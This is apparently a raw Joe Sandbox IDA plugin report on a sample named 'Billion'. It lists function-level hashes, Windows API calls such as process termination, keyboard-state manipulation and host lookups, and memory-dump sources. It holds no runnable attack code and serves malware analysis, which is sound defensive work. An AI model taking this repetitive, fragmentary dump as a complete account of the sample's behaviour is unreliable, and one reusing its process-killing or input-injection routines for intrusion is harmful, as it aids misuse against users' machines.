                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_130000_Billion.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: Window$Long$MetricsSystem
                                                                                                                                                                                                                                                                                                          • String ID: (
                                                                                                                                                                                                                                                                                                          • API String ID: 2294984445-2181176062
                                                                                                                                                                                                                                                                                                          • Opcode ID: a9ba0a944e55f3064bcc54e45888d12e543e92491c42e8ac7fde1860ff227952
                                                                                                                                                                                                                                                                                                          • Instruction ID: dd914a317396d2f0ca9d4e75a64076ebda5a9c4ef2d3098cb97d5b8f0772df61
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a9ba0a944e55f3064bcc54e45888d12e543e92491c42e8ac7fde1860ff227952
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7A214A72610355EFCB189F38DC88F6A3BA5EB95365F25463EE926C25E0EB30C850CB10
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          • LoadIconW.USER32(00000000,00007F03), ref: 0019D1BE
                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3324557168.0000000000131000.00000020.00000001.01000000.00000007.sdmp, Offset: 00130000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324518263.0000000000130000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001CD000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001F3000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324735392.00000000001FD000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324772151.0000000000205000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_130000_Billion.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: IconLoad
                                                                                                                                                                                                                                                                                                          • String ID: blank$info$question$stop$warning
                                                                                                                                                                                                                                                                                                          • API String ID: 2457776203-404129466
                                                                                                                                                                                                                                                                                                          • Opcode ID: 55cc82ba7abe9a4c2d7bde1511014a0439a3cd72e586bb5887cf2535ca1908d5
                                                                                                                                                                                                                                                                                                          • Instruction ID: 9e37b949dac32981b39ded19d724f02b777c3fb0fa23a43373027327617b642c
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 55cc82ba7abe9a4c2d7bde1511014a0439a3cd72e586bb5887cf2535ca1908d5
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B911DA3765C30AFBEB056B94FC82D7A77EC9F25765B21003AFA01AA1C1D7B4AA404261
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3324557168.0000000000131000.00000020.00000001.01000000.00000007.sdmp, Offset: 00130000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324518263.0000000000130000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001CD000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001F3000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324735392.00000000001FD000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324772151.0000000000205000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_130000_Billion.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: CleanupStartup_strcatgethostbynamegethostnameinet_ntoa
                                                                                                                                                                                                                                                                                                          • String ID: 0.0.0.0
                                                                                                                                                                                                                                                                                                          • API String ID: 642191829-3771769585
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          • PostMessageW.USER32(?,00000010,00000000,00000000), ref: 0019F447
                                                                                                                                                                                                                                                                                                          • SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 0019F45D
                                                                                                                                                                                                                                                                                                          • GetWindowThreadProcessId.USER32(?,?), ref: 0019F46C
                                                                                                                                                                                                                                                                                                          • OpenProcess.KERNEL32(________________________________________________________________________________abccccccccdeefghijklmnopqrstuvwxrstuvwxrstuvwxrstuvwxrstuvwxrstuvwxrstuvwxrstuvwxrstuvwxrstuvwxrstuvwxrstuvwxrstyzzzzzzzzzzzzzzzz{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{_,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 0019F47B
                                                                                                                                                                                                                                                                                                          • TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 0019F485
                                                                                                                                                                                                                                                                                                          • CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 0019F48C
                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                          • ________________________________________________________________________________abccccccccdeefghijklmnopqrstuvwxrstuvwxrstuvwxrstuvwxrstuvwxrstuvwxrstuvwxrstuvwxrstuvwxrstuvwxrstuvwxrstuvwxrstyzzzzzzzzzzzzzzzz{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{_, xrefs: 0019F476
Memory Dump Source
• Source File: 0000000C.00000002.3324557168.0000000000131000.00000020.00000001.01000000.00000007.sdmp, Offset: 00130000, based on PE: true
• Associated: 0000000C.00000002.3324518263.0000000000130000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3324627869.00000000001CD000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3324627869.00000000001F3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3324735392.00000000001FD000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3324772151.0000000000205000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_130000_Billion.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
                                                                                                                                                                                                                                                                                                          • String ID: ________________________________________________________________________________abccccccccdeefghijklmnopqrstuvwxrstuvwxrstuvwxrstuvwxrstuvwxrstuvwxrstuvwxrstuvwxrstuvwxrstuvwxrstuvwxrstuvwxrstyzzzzzzzzzzzzzzzz{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{_
                                                                                                                                                                                                                                                                                                          • API String ID: 839392675-1455413529
                                                                                                                                                                                                                                                                                                          APIs
Memory Dump Source
• Source File: 0000000C.00000002.3324557168.0000000000131000.00000020.00000001.01000000.00000007.sdmp, Offset: 00130000, based on PE: true
• Associated: 0000000C.00000002.3324518263.0000000000130000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3324627869.00000000001CD000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3324627869.00000000001F3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3324735392.00000000001FD000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3324772151.0000000000205000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_130000_Billion.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: _wcslen$LocalTime
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 952045576-0
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          • DeleteObject.GDI32(00000000), ref: 001C37B7
                                                                                                                                                                                                                                                                                                          • GetDC.USER32(00000000), ref: 001C37BF
                                                                                                                                                                                                                                                                                                          • GetDeviceCaps.GDI32(00000000,0000005A), ref: 001C37CA
                                                                                                                                                                                                                                                                                                          • ReleaseDC.USER32(00000000,00000000), ref: 001C37D6
                                                                                                                                                                                                                                                                                                          • CreateFontW.GDI32(?,00000000,00000000,00000000,?,00000000,00000000,00000000,00000001,00000004,00000000,?,00000000,?), ref: 001C3812
                                                                                                                                                                                                                                                                                                          • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 001C3823
                                                                                                                                                                                                                                                                                                          • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,001C6504,?,?,000000FF,00000000,?,000000FF,?), ref: 001C385E
                                                                                                                                                                                                                                                                                                          • SendMessageW.USER32(?,00000142,00000000,00000000), ref: 001C387D
Memory Dump Source
• Source File: 0000000C.00000002.3324557168.0000000000131000.00000020.00000001.01000000.00000007.sdmp, Offset: 00130000, based on PE: true
• Associated: 0000000C.00000002.3324518263.0000000000130000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3324627869.00000000001CD000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3324627869.00000000001F3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3324735392.00000000001FD000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3324772151.0000000000205000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_130000_Billion.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 3864802216-0
                                                                                                                                                                                                                                                                                                          Strings
Memory Dump Source
• Source File: 0000000C.00000002.3324557168.0000000000131000.00000020.00000001.01000000.00000007.sdmp, Offset: 00130000, based on PE: true
• Associated: 0000000C.00000002.3324518263.0000000000130000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3324627869.00000000001CD000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3324627869.00000000001F3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3324735392.00000000001FD000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3324772151.0000000000205000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_130000_Billion.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                                                          • String ID: NULL Pointer assignment$Not an Object type
                                                                                                                                                                                                                                                                                                          • API String ID: 0-572801152
                                                                                                                                                                                                                                                                                                          • Opcode ID: b608e907969d4998866abc90cdf8a0883c661ddcde78dcc8622771035e648b4b
                                                                                                                                                                                                                                                                                                          • Instruction ID: 8a002dcf9baf5408e89e9d6886ebc87f8c4be6ff02a90d3a8c399bf6801a7fbc
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: b608e907969d4998866abc90cdf8a0883c661ddcde78dcc8622771035e648b4b
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 72D19E71A0060A9FDF14CFA8C885BEEB7B6FF48304F158569E915AB281E770ED45CB50
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          • GetCPInfo.KERNEL32(00000000,00000000,?,7FFFFFFF,?,?,00171B7B,00000000,00000000,?,00000000,?,?,?,?,00000000), ref: 0017194E
                                                                                                                                                                                                                                                                                                          • MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000000,00000000,00000000,?,00171B7B,00000000,00000000,?,00000000,?,?,?,?), ref: 001719D1
                                                                                                                                                                                                                                                                                                          • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000000,00000000,00171B7B,?,00171B7B,00000000,00000000,?,00000000,?,?,?,?), ref: 00171A64
                                                                                                                                                                                                                                                                                                          • MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000000,00000000,00000000,?,00171B7B,00000000,00000000,?,00000000,?,?,?,?), ref: 00171A7B
                                                                                                                                                                                                                                                                                                            • Part of subcall function 00163B93: RtlAllocateHeap.NTDLL(00000000,?,?,?,00156A79,?,0000015D,?,?,?,?,001585B0,000000FF,00000000,?,?), ref: 00163BC5
                                                                                                                                                                                                                                                                                                          • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000000,00000000,00000000,?,00171B7B,00000000,00000000,?,00000000,?,?,?,?), ref: 00171AF7
                                                                                                                                                                                                                                                                                                          • __freea.LIBCMT ref: 00171B22
                                                                                                                                                                                                                                                                                                          • __freea.LIBCMT ref: 00171B2E
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3324557168.0000000000131000.00000020.00000001.01000000.00000007.sdmp, Offset: 00130000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324518263.0000000000130000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001CD000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001F3000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324735392.00000000001FD000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324772151.0000000000205000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_130000_Billion.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: ByteCharMultiWide$__freea$AllocateHeapInfo
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 2829977744-0
                                                                                                                                                                                                                                                                                                          • Opcode ID: f27166ee106ef373478ef5a4f7e994992b31f473c7c6d374b15fec007a6c646d
                                                                                                                                                                                                                                                                                                          • Instruction ID: d9ca82fb84af23f30a9da8ca81caef8a86ed27ba3afb7fb24332d15b848f4c62
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f27166ee106ef373478ef5a4f7e994992b31f473c7c6d374b15fec007a6c646d
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9091D472E00216BBDB248EACCC91EEEBBB5EF19714F198129E909E7180E734DD41C760
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: Variant$ClearInit
                                                                                                                                                                                                                                                                                                          • String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
                                                                                                                                                                                                                                                                                                          • API String ID: 2610073882-625585964
                                                                                                                                                                                                                                                                                                          • Opcode ID: f51843c0d44d3d8b79976feab8a1b954f67155e318729fe0fe4d869edfc6222b
                                                                                                                                                                                                                                                                                                          • Instruction ID: 10f51a3e6fcaf042568587d3c615b4f60285fa1f286a561bbc86853965244cfb
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f51843c0d44d3d8b79976feab8a1b954f67155e318729fe0fe4d869edfc6222b
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F7919A71A00619ABDF24DFA5C888FEEBBB9AF49314F108559F505AB280D7709941CFA0
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          • VariantInit.OLEAUT32(?), ref: 001B43C8
                                                                                                                                                                                                                                                                                                          • CharUpperBuffW.USER32(?,?), ref: 001B44D7
                                                                                                                                                                                                                                                                                                          • _wcslen.LIBCMT ref: 001B44E7
                                                                                                                                                                                                                                                                                                          • VariantClear.OLEAUT32(?), ref: 001B467C
                                                                                                                                                                                                                                                                                                            • Part of subcall function 001A169E: VariantInit.OLEAUT32(00000000), ref: 001A16DE
                                                                                                                                                                                                                                                                                                            • Part of subcall function 001A169E: VariantCopy.OLEAUT32(?,?), ref: 001A16E7
                                                                                                                                                                                                                                                                                                            • Part of subcall function 001A169E: VariantClear.OLEAUT32(?), ref: 001A16F3
                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: Variant$ClearInit$BuffCharCopyUpper_wcslen
                                                                                                                                                                                                                                                                                                          • String ID: AUTOIT.ERROR$Incorrect Parameter format
                                                                                                                                                                                                                                                                                                          • API String ID: 4137639002-1221869570
                                                                                                                                                                                                                                                                                                          • Opcode ID: f4b5596d6b6b6aa1fbc655036723b1e07f945ac796c9beffaf32e889792a3f4e
                                                                                                                                                                                                                                                                                                          • Instruction ID: 450c2e5ddc7c98c487d03a0723aecd32f9be5fcc0d2702fd65a001a44f8dd532
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f4b5596d6b6b6aa1fbc655036723b1e07f945ac796c9beffaf32e889792a3f4e
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 81918A746083019FCB14EF24C4809AAB7E5FF99714F14892DF88A9B352DB31ED06CB92
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                            • Part of subcall function 001908FE: CLSIDFromProgID.OLE32(?,?,?,00000000,?,?,?,-C000001E,00000001,?,00190831,80070057,?,?,?,00190C4E), ref: 0019091B
                                                                                                                                                                                                                                                                                                            • Part of subcall function 001908FE: ProgIDFromCLSID.OLE32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00190831,80070057,?,?), ref: 00190936
                                                                                                                                                                                                                                                                                                            • Part of subcall function 001908FE: lstrcmpiW.KERNEL32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00190831,80070057,?,?), ref: 00190944
                                                                                                                                                                                                                                                                                                            • Part of subcall function 001908FE: CoTaskMemFree.OLE32(00000000,?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00190831,80070057,?), ref: 00190954
                                                                                                                                                                                                                                                                                                          • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000,00000001,?,?), ref: 001B56AE
                                                                                                                                                                                                                                                                                                          • _wcslen.LIBCMT ref: 001B57B6
                                                                                                                                                                                                                                                                                                          • CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,?), ref: 001B582C
                                                                                                                                                                                                                                                                                                          • CoTaskMemFree.OLE32(?), ref: 001B5837
                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3324557168.0000000000131000.00000020.00000001.01000000.00000007.sdmp, Offset: 00130000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324518263.0000000000130000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001CD000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001F3000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324735392.00000000001FD000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324772151.0000000000205000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_130000_Billion.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: FreeFromProgTask$CreateInitializeInstanceSecurity_wcslenlstrcmpi
                                                                                                                                                                                                                                                                                                          • String ID: NULL Pointer assignment
                                                                                                                                                                                                                                                                                                          • API String ID: 614568839-2785691316
                                                                                                                                                                                                                                                                                                          • Opcode ID: 0633dc3b40212d63ccd02d2986813b1474077ca81d24896001e1dfea8fa2b7d8
                                                                                                                                                                                                                                                                                                          • Instruction ID: 394694ce61c858716b0b6ade5c2b24cd4a6fafa6032ea6039e34a05dc8c761d6
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 0633dc3b40212d63ccd02d2986813b1474077ca81d24896001e1dfea8fa2b7d8
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 19910471D00219EFDF14DFA4D881EEEBBB9BF18304F10456AE915AB251EB709A44CFA0
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          • GetMenu.USER32(?), ref: 001C2C1F
                                                                                                                                                                                                                                                                                                          • GetMenuItemCount.USER32(00000000), ref: 001C2C51
                                                                                                                                                                                                                                                                                                          • GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 001C2C79
                                                                                                                                                                                                                                                                                                          • _wcslen.LIBCMT ref: 001C2CAF
                                                                                                                                                                                                                                                                                                          • GetMenuItemID.USER32(?,?), ref: 001C2CE9
                                                                                                                                                                                                                                                                                                          • GetSubMenu.USER32(?,?), ref: 001C2CF7
                                                                                                                                                                                                                                                                                                            • Part of subcall function 00194393: GetWindowThreadProcessId.USER32(?,00000000), ref: 001943AD
                                                                                                                                                                                                                                                                                                            • Part of subcall function 00194393: GetCurrentThreadId.KERNEL32 ref: 001943B4
                                                                                                                                                                                                                                                                                                            • Part of subcall function 00194393: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,00192F00), ref: 001943BB
                                                                                                                                                                                                                                                                                                          • PostMessageW.USER32(?,00000111,00000000,00000000), ref: 001C2D7F
                                                                                                                                                                                                                                                                                                            • Part of subcall function 0019F292: Sleep.KERNEL32 ref: 0019F30A
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: Menu$Thread$Item$AttachCountCurrentInputMessagePostProcessSleepStringWindow_wcslen
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 4196846111-0
                                                                                                                                                                                                                                                                                                          • Opcode ID: c763b380aa67dc2d0027bfb53855455ed458cd381808d0a2b3cd68e14beea962
                                                                                                                                                                                                                                                                                                          • Instruction ID: 3b6605695e5f3fb2c69818ca5e9de571206c4f77f743a107a0575838167abd64
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c763b380aa67dc2d0027bfb53855455ed458cd381808d0a2b3cd68e14beea962
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 29716D75A00215AFCB15EFA4C845FAEBBF1EF68310F15846DE816AB351DB34EE418B90
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          • GetParent.USER32(?), ref: 0019B8C0
                                                                                                                                                                                                                                                                                                          • GetKeyboardState.USER32(?), ref: 0019B8D5
                                                                                                                                                                                                                                                                                                          • SetKeyboardState.USER32(?), ref: 0019B936
                                                                                                                                                                                                                                                                                                          • PostMessageW.USER32(?,00000101,00000010,?), ref: 0019B964
                                                                                                                                                                                                                                                                                                          • PostMessageW.USER32(?,00000101,00000011,?), ref: 0019B983
                                                                                                                                                                                                                                                                                                          • PostMessageW.USER32(?,00000101,00000012,?), ref: 0019B9C4
                                                                                                                                                                                                                                                                                                          • PostMessageW.USER32(?,00000101,0000005B,?), ref: 0019B9E7
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: MessagePost$KeyboardState$Parent
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 87235514-0
                                                                                                                                                                                                                                                                                                          • Opcode ID: 1ae4658286d2afaa704dc8853e674bf09b15c8cc2860ba61a59f1dabcda9fd95
                                                                                                                                                                                                                                                                                                          • Instruction ID: 712686302e911a6b65bd9056f2a516d534c38a6beb93939ff0c08514dd282e2e
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 1ae4658286d2afaa704dc8853e674bf09b15c8cc2860ba61a59f1dabcda9fd95
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7651E2A061C7D53EFF3642349D95BBABEA95F06708F088489E1D5468D2C3E8EDC4D750
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          • GetParent.USER32(00000000), ref: 0019B6E0
                                                                                                                                                                                                                                                                                                          • GetKeyboardState.USER32(?), ref: 0019B6F5
                                                                                                                                                                                                                                                                                                          • SetKeyboardState.USER32(?), ref: 0019B756
                                                                                                                                                                                                                                                                                                          • PostMessageW.USER32(00000000,00000100,00000010,?), ref: 0019B782
                                                                                                                                                                                                                                                                                                          • PostMessageW.USER32(00000000,00000100,00000011,?), ref: 0019B79F
                                                                                                                                                                                                                                                                                                          • PostMessageW.USER32(00000000,00000100,00000012,?), ref: 0019B7DE
                                                                                                                                                                                                                                                                                                          • PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 0019B7FF
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: MessagePost$KeyboardState$Parent
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 87235514-0
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          • GetConsoleCP.KERNEL32(FF8BC35D,00000000,?,?,?,?,?,?,?,00165F16,?,00000000,FF8BC35D,00000000,00000000,FF8BC369), ref: 001657E3
                                                                                                                                                                                                                                                                                                          • __fassign.LIBCMT ref: 0016585E
                                                                                                                                                                                                                                                                                                          • __fassign.LIBCMT ref: 00165879
                                                                                                                                                                                                                                                                                                          • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,FF8BC35D,00000005,00000000,00000000), ref: 0016589F
                                                                                                                                                                                                                                                                                                          • WriteFile.KERNEL32(?,FF8BC35D,00000000,00165F16,00000000,?,?,?,?,?,?,?,?,?,00165F16,?), ref: 001658BE
                                                                                                                                                                                                                                                                                                          • WriteFile.KERNEL32(?,?,00000001,00165F16,00000000,?,?,?,?,?,?,?,?,?,00165F16,?), ref: 001658F7
Memory Dump Source
• Source File: 0000000C.00000002.3324557168.0000000000131000.00000020.00000001.01000000.00000007.sdmp, Offset: 00130000, based on PE: true
• Associated: 0000000C.00000002.3324518263.0000000000130000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3324627869.00000000001CD000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3324627869.00000000001F3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3324735392.00000000001FD000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3324772151.0000000000205000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_130000_Billion.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 1324828854-0
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: _free
                                                                                                                                                                                                                                                                                                          • String ID: `
                                                                                                                                                                                                                                                                                                          • API String ID: 269201875-609909085
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          • _ValidateLocalCookies.LIBCMT ref: 001530BB
                                                                                                                                                                                                                                                                                                          • ___except_validate_context_record.LIBVCRUNTIME ref: 001530C3
                                                                                                                                                                                                                                                                                                          • _ValidateLocalCookies.LIBCMT ref: 00153151
                                                                                                                                                                                                                                                                                                          • __IsNonwritableInCurrentImage.LIBCMT ref: 0015317C
                                                                                                                                                                                                                                                                                                          • _ValidateLocalCookies.LIBCMT ref: 001531D1
                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                                                                                                                                                                                                                                                                          • String ID: csm
                                                                                                                                                                                                                                                                                                          • API String ID: 1170836740-1018135373
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                            • Part of subcall function 001B3AAB: inet_addr.WSOCK32(?,?,?,?,?,00000000), ref: 001B3AD7
                                                                                                                                                                                                                                                                                                            • Part of subcall function 001B3AAB: _wcslen.LIBCMT ref: 001B3AF8
